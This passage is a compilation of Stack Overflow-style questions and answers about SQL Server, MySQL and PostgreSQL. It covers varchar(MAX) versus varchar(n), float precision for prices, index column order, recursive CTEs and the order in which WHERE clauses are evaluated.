Over time, this method should converge to an optimized N-rows solution for your particular query/environment/etc. And should adjust (slowly but steadily) when conditions change (e.g. high-concurrency vs low-concurrency)

Just one -- scratch that, two -- more things...

  1. As a DBA, I have to say...it should be exceedingly rare for any query to take more than 5 seconds. In particular, if it's a query that runs frequently and is used by the front end application, then it absolutely should not ever run for 5 seconds. If you really do have a user-facing query that can't complete in 5 seconds, that's a sign that the database design needs improvement.

  2. Jonathan VM's Law Of The Greenbar Report I used to work for a company that still used a mainframe application that spit out reams of greenbar dot-matrix-printed reports every day. Most of these were ignored, and of the few that were used, most were never read beyond the first page. A report might have thousands of rows sorted by descending account age...and all that user needed was to see the 10 most aged. My law is this: The number of use cases that actually require seeing a vast number of rows is infinitesimally small. Think - really think - about the use case for your query, and whether having lots and lots of records is really what that user needs.

Is varchar(MAX) always preferable?

9 votes

Regarding SQL Server, I understand :

  • var means the memory is lazy allocated, meaning it fits to the data exactly (on insertion).

  • MAX means there is no size restriction\limitation.

Then, is it always preferable to use MAX when using varchar, as we don't allocate the whole size anyhow?

Should we use a constant size only if there is a constraint we want to enforce on this DB column?

There is a very good article on this subject by SO User @Remus Rusanu. Here is a snippit that I've stolen but I suggest you read the whole thing:

The code path that handles the MAX types (varchar, nvarchar and varbinary) is different from the code path that handles their equivalent non-max length types. The non-max types can internally be represented as an ordinary pointer-and-length structure. But the max types cannot be stored internally as a contiguous memory area, since they can possibly grow up to 2Gb. So they have to be represented by a streaming interface, similar to COM’s IStream. This carries over to every operation that involves the max types, including simple assignment and comparison, since these operations are more complicated over a streaming interface. The biggest impact is visible in the code that allocates and assign max-type variables (my first test), but the impact is visible on every operation.

In the article he shows several examples that demonstrate that using varchar(n) typically improves performance.

You can find the entire article here.

What is "*;1" in TADOStoredProc.ProcedureName value in Delphi?

8 votes

You may specify TADOStoredProc.ProcedureName in Delphi with the following value:

MSSQLProcedureName;1

But what does meen ";1" in this value?

Thanks for the help!

This is an optional value that can be used to specify multiple definitions for the same stored procedure name... I think that the original intention was to allow versioning, but I've never seen it used that way in the wild.

When you don't specify the number in the create procedure statement, it defaults to 1. Some of the various data access layers that call SQL Server will explicitly add the ;1 when executing the stored procedure.

From MSDN:

;*number*

Is an optional integer used to group procedures of the same name so they can be dropped together with a single DROP PROCEDURE statement. For example, the procedures used with an application called orders may be named orderproc;1, orderproc;2, and so on. The statement DROP PROCEDURE orderproc drops the entire group. If the name contains delimited identifiers, the number should not be included as part of the identifier; use the appropriate delimiter around procedure_name only.

Tool for detecting copy/pasted code in TSQL?

8 votes

I'm working on a SQL Server 2005 system with a lot of copy-pasted code, lots of repeated calculations instead of functions, many stored procedures that differ only very slightly instead of being parameterized. Also lots of SSIS packages that are very similar.

Moving forward, I'd like to be able to to detect this type of "code smell". There's lots of tools around for this, but I haven't found anything for SQL.

Any ideas on products to use, or best practices to apply regarding copy/pasted code in TSQL?

Many thanks...

EDIT: Thanks for all the feedback. I poked around with a couple of them, but the one that looks most straightforward and easy to use appears to be Atomiq. I had to exported all my objects to .sql files, then had to use a batch file to rename all the files with extension .sql to .cs because it doesn't use .cs. However, I've already gotten some good information on major problems with our code.

You have several for that purpose:

  • Atomiq - commercial
  • Black Duck Suite - commercial (software analyzing suite)
  • CloneDR - commercial (Ada, C, C++, C#, Java, COBOL, Fortran, Python, VB.net, VB6, PHP4/5, PLSQL, SQL2011, XML, many others)
  • ConQAT (Open Source, supports: ABAP, ADA, Cobol, C/C++, C#, Java, PL/I, PL/SQL, Python, Text, Transact SQL, Visual Basic, XML)
  • Simian (software)

SQL query ordered alphabetically

8 votes

I have a table as below,

ID    Description
--------------------
1     Bacteria
2     Cell Lines
3     Compounds
4     Virus
5     Others
6     AntiBody

What I want is a single SQL query, ordered alphabetically but have 'Other' (ID 5) as the last record. Is that even possible?

Any help would greatly appreciated. Thanks.

SELECT ID, Description
    FROM YourTable
    ORDER BY CASE WHEN ID = 5 THEN 1 ELSE 0 END,
             Description

Get database schema with one query?

7 votes

Basically I want to get the table names, and the field names for each table from the current database that is connected, nothing else.

Is this possible?

I know that SHOW TABLES FROM my_database gets you the table names, and SHOW COLUMNS FROM my_table will get you the fields, but that's at least [1 x # of tables] queries and I get more information that I want :)

The INFORMATION_SCHEMA.COLUMNS table has what you're asking for.

SELECT table_name, column_name
    FROM INFORMATION_SCHEMA.COLUMNS
    WHERE table_schema = 'YourDBName'
    ORDER BY table_name, ordinal_position

Strip special characters in SQL without loop?

7 votes

Is there a way to strip special characters (leaving just alphanumeric) from a string/field in SQL server without a loop / custom function?

So far, the best i've come up with is:

Create Function [dbo].[strip_special](@Temp VarChar(1000))
Returns VarChar(1000)
AS
Begin
    While PatIndex('%[^a-z0-9]%', @Temp) > 0
        Set @Temp = Stuff(@Temp, PatIndex('%[^a-z0-9]%', @Temp), 1, '')
    Return @TEmp
End

On some servers I don't have the privileges to cread user defined functions so i'd like to be able to achieve the same result without. I also have concerns over the efficiency/performance of the loop (although I guess even a built-in function/method would probably itself use a loop).

Thanks

I assume you have a column that you want replaced, this is how you could do it:

 declare @table table(id int, temp varchar(15))


insert @table values(1, 'abc-.123+')
insert @table values(2, '¤%&(abc-.?=&(/#')

;with t1 as
(
select temp a, id from @table
union all
select cast(replace(a, substring(a, PatIndex('%[^a-z0-9]%', a), 1), '') as varchar(15)), id
from t1
where PatIndex('%[^a-z0-9]%', a) > 0
)
select t2.*, t1.a from t1
join @table t2
on t1.id = t2.id
where PatIndex('%[^a-z0-9]%', a) = 0
option (maxrecursion 0)

Result:

id          temp            a
----------- --------------- ---------------
2           ¤%&(abc-.?=&(/# abc
1           abc-.123+       abc123

SQL MIN() strange value

7 votes

I'm working on a small webshop and I'm trying to get the lowest price for a product (photos).

So I check to see what the lowest added price is (photos can be ordered in different sizes):

SELECT 
  MIN(price) as price 
FROM 
  rm_prices 
WHERE 
  photo_id = '47' AND 
  price != '0'

This returns the lowest value found for this product.

When I check my db, I see that the lowest value is 1256.3.
When I print my result, the number give is 1256.30004882813.
The value is set as a FLOAT.

Why is the result 1256.30004882813 and not 1256.3?

Because the real number 1256.3 cannot be represented precisely in floating point.

You should be using a fixed-point datatype for monetary data. Quoting from the MySQL documentation:

The DECIMAL and NUMERIC types store exact numeric data values. These types are used when it is important to preserve exact precision, for example with monetary data.

Performance of mysql WHERE ... IN

7 votes

I have mysql queries with a WHERE IN statement.

SELECT * FROM table1 WHERE id IN (1, 2, 15, 17, 150 ....)

How will it perform with hundreds of ids in the IN clause? is it designed to work with many arguments? (my table will have hundreds of thousands of rows and id is the primary field)

is there a better way to do it?

EDIT: I am getting the Ids from the result set of a search server query. So not from the database. I guess a join statement wouldn't work.

You should put the IN clause "arguments" into table2 for instance.

Afterwords you make this:

SELECT t1.* FROM table1 t1
INNER JOIN table2 t2 ON t1.Id = t2.Id

Is it possible to merge in a SELECT in SQL?

6 votes

Let's say I want to retrieve 100 records from a table called messages, and I want to obtain them the following way:

1st message
100th message
2nd message
99th message
3rd message
98th message
(...)

Is there any way to do this efficiently? What would be the appropriate query? Or should I make a query to select the first 50, a query to select the last 50 and then merge the results?

Try if your ID is a sequence of numbers:

First

SET @half = (SELECT MAX(id) FROM messages)/2;

Then

SELECT * FROM `messages` ORDER BY (IF(id<@half,@half*2-id,id-1)) DESC,id ASC;

how to build 2^n changed word from word with length n in sql server

6 votes

I need a function in sql server to build all of changed word in below example; for input word with length n must build 2^n changed word; For example, if the input of the function is

"I"

the output of the function should be

I
-   

the input of the function is

"am"

the output of the function should be

am
-m
a-
--

the input of the function is

"sql"

the output of the function should be

sql
-ql
s-l
sq-
--l
s--
-q-
--- 

You can do this with a numbers table (master..spt_values) and stuff in a loop.

declare @Word varchar(10) = 'sql'

declare @T table
(
  Word varchar(10)
)

insert into @T values (@Word)

while not exists(select *
                 from @T 
                 where Word = replicate('-', len(@Word)))
begin              
  insert into @T(Word)
  select distinct stuff(T.Word, N.number, 1, '-')
  from @T as T
    cross join
       master..spt_values as N
  where N.type = 'P' and
        N.number between 1 and len(@Word) and
        stuff(T.Word, N.number, 1, '-') not in (select Word from @T)
end        

select *
from @T

http://data.stackexchange.com/stackoverflow/q/122334/

Or you can use a reqursive CTE

declare @Word varchar(10) = 'sql'

;with C as
(
  select @Word as Word,
         0 as Iteration
  union all
  select cast(stuff(Word, N.number, 1, '-') as varchar(10)),
         Iteration + 1
  from C
    cross join
       master..spt_values as N
  where N.type = 'P' and
        N.number between 1 and len(@Word) and
        Iteration < len(@Word)
)
select distinct Word
from C

http://data.stackexchange.com/stackoverflow/q/122337/

Update

The recursive CTE version is really slow as pointed out by OP in a comment. Using a word with 7 letters there are 960800 rows returned from the CTE.

Update with function called once for each row in Postgres 8.4

6 votes

I have the following UPDATE statement:

update mytable
   set a = first_part(genid()),
       b = second_part(genid()),
       c = third_path(genid())
 where package_id = 10;

In this example the function genid() is called three times for each row, which is wrong - I want it to be called only once for each row of mytable.

I'm using PostgreSQL 8.4 database. How to write the correct update?

I've tried something like this:

update mytable
   set a = first_part(g),
       b = second_part(g),
       c = third_path(g)
 where package_id = 10
  from genid() as g;

But it didn't work, because genid() has been called only once for the whole update statement.

Have you tried Postgres' non-standard UPDATE .. FROM clause? I imagine, this would work

update mytable
   set a = first_part(gen.id),
       b = second_part(gen.id),
       c = third_path(gen.id)
  from (
          select genid() as genid, id
          from mytable 
          where package_id = 10
       ) gen
 where mytable.id = gen.id;
 --and package_id = 10 -- This predicate is no longer necessary as the subquery
                       -- already filters on package_id, as Erwin mentioned

Note that I'm forcing genid() to be called exactly once per record in mytable within the subselect. Then I'm self-joining mytable and gen using a hypothetical id column. See the documentation here:

http://www.postgresql.org/docs/current/interactive/sql-update.html

This seems to have been introduced with Postgres 9.0 only, though. If that seems too complicated (i.e. not very readable), you can still resort to pgplsql as user Florin suggested here.

Why did creating this new index improve performance so much when existing index included all columns in new index?

5 votes

I have Log and LogItem tables; I'm writing a query to grab some data from both. There are thousands of Logs and each Log can have up to 125 LogItems

The query in question is complicated so I'm skipping it (if someone thinks it's important I can probably post it), but when I ran SSMS Estimated Query plan, it told me a new Non-Clustered index would improve performance up to 100%.

Existing Index: Non-clustered
Key Colums (LogItem): ParentLogID, DateModified, Name, DatabaseModified

Query Plan Recommendation
CREATE NONCLUSTERED INDEX [LogReportIndex]
ON [dbo].[LogItem] ([ParentLogID],[DatabaseModified])

Just for fun, I created this new index and ran the query and much to my surprise, it now takes ~1 second for my query to run, when before it was 10+ seconds.

I assumed that my existing index would cover this new query, so my question is why did creating a new index on the only columns used in my new query improve performance? Should I have an index for each unique combination of columns used in my where clauses?

note: I don't think this is because the SQL Server is caching my results, I ran the query about 25-30 times before I created the index and it consistantly took 10-15 seconds, after the index it is now consistantly ~1 or less.

Order of columns in an index is important. If filtering requires column 1 and 4 from index, the index is not going to help. It's only useful when filtering by the first N consecutive columns.

This is because index is a tree. You can't efficiently select all nodes of the tree where column3 = something, because they are scattered all other the place, belonging to different values of column1 and column2. But if you know column1 and column2 as well, locating the right branch in the tree is a no brainer.

SQL and logical operators and null checks

5 votes

I've got a vague, possibly cargo-cult memory from years of working with SQL Server that when you've got a possibly-null column, it's not safe to write "WHERE" clause predicates like:

 ... WHERE the_column IS NULL OR the_column < 10 ...

It had something to do with the fact that SQL rules don't stipulate short-circuiting (and in fact that's kind-of a bad idea possibly for query optimization reasons), and thus the "<" comparison (or whatever) could be evaluated even if the column value is null. Now, exactly why that'd be a terrible thing, I don't know, but I recall being sternly warned by some documentation to always code that as a "CASE" clause:

 ... WHERE 1 = CASE WHEN the_column IS NULL THEN 1 WHEN the_column < 10 THEN 1 ELSE 0 END ...

(the goofy "1 = " part is because SQL Server doesn't/didn't have first-class booleans, or at least I thought it didn't.)

So my questions here are:

  1. Is that really true for SQL Server (or perhaps back-rev SQL Server 2000 or 2005) or am I just nuts?
  2. If so, does the same caveat apply to PostgreSQL? (8.4 if it matters)
  3. What exactly is the issue? Does it have to do with how indexes work or something?

My grounding in SQL is pretty weak.

I don't know SQL Server so I can't speak to that.

Given an expression a L b for some logical operator L, there is no guarantee that a will be evaluated before or after b or even that both a and b will be evaluated:

Expression Evaluation Rules

The order of evaluation of subexpressions is not defined. In particular, the inputs of an operator or function are not necessarily evaluated left-to-right or in any other fixed order.

Furthermore, if the result of an expression can be determined by evaluating only some parts of it, then other subexpressions might not be evaluated at all.
[...]
Note that this is not the same as the left-to-right "short-circuiting" of Boolean operators that is found in some programming languages.

As a consequence, it is unwise to use functions with side effects as part of complex expressions. It is particularly dangerous to rely on side effects or evaluation order in WHERE and HAVING clauses, since those clauses are extensively reprocessed as part of developing an execution plan.

As far as an expression of the form:

the_column IS NULL OR the_column < 10

is concerned, there's nothing to worry about since NULL < n is NULL for all n, even NULL < NULL evaluates to NULL; furthermore, NULL is false is a boolean context so

null is null or null < 10

should evaluate to true regardless which sub-expression is evaluated first.

The whole "use a CASE" sounds mostly like cargo-cult SQL to me. However, like most cargo-cultism, there is a kernel a truth buried under the cargo; just below my first excerpt from the PostgreSQL manual, you will find this:

When it is essential to force evaluation order, a CASE construct (see Section 9.16) can be used. For example, this is an untrustworthy way of trying to avoid division by zero in a WHERE clause:

SELECT ... WHERE x > 0 AND y/x > 1.5;

But this is safe:

SELECT ... WHERE CASE WHEN x > 0 THEN y/x > 1.5 ELSE false END;

So, if you need to guard against a condition that will raise an exception or have other side effects, then you should use a CASE to control the order of evaluation as a CASE is evaluated in order:

Each condition is an expression that returns a boolean result. If the condition's result is true, the value of the CASE expression is the result that follows the condition, and the remainder of the CASE expression is not processed. If the condition's result is not true, any subsequent WHEN clauses are examined in the same manner.

So given this:

case when A then Ra
     when B then Rb
     when C then Rc
     ...

A is guaranteed to be evaluated before B, B before C, etc. and evaluation stops as soon as one of the conditions evaluates to a true value.

In summary, a CASE short-circuits buts neither AND nor OR short-circuit so you only need to use a CASE when you need to protect against side effects.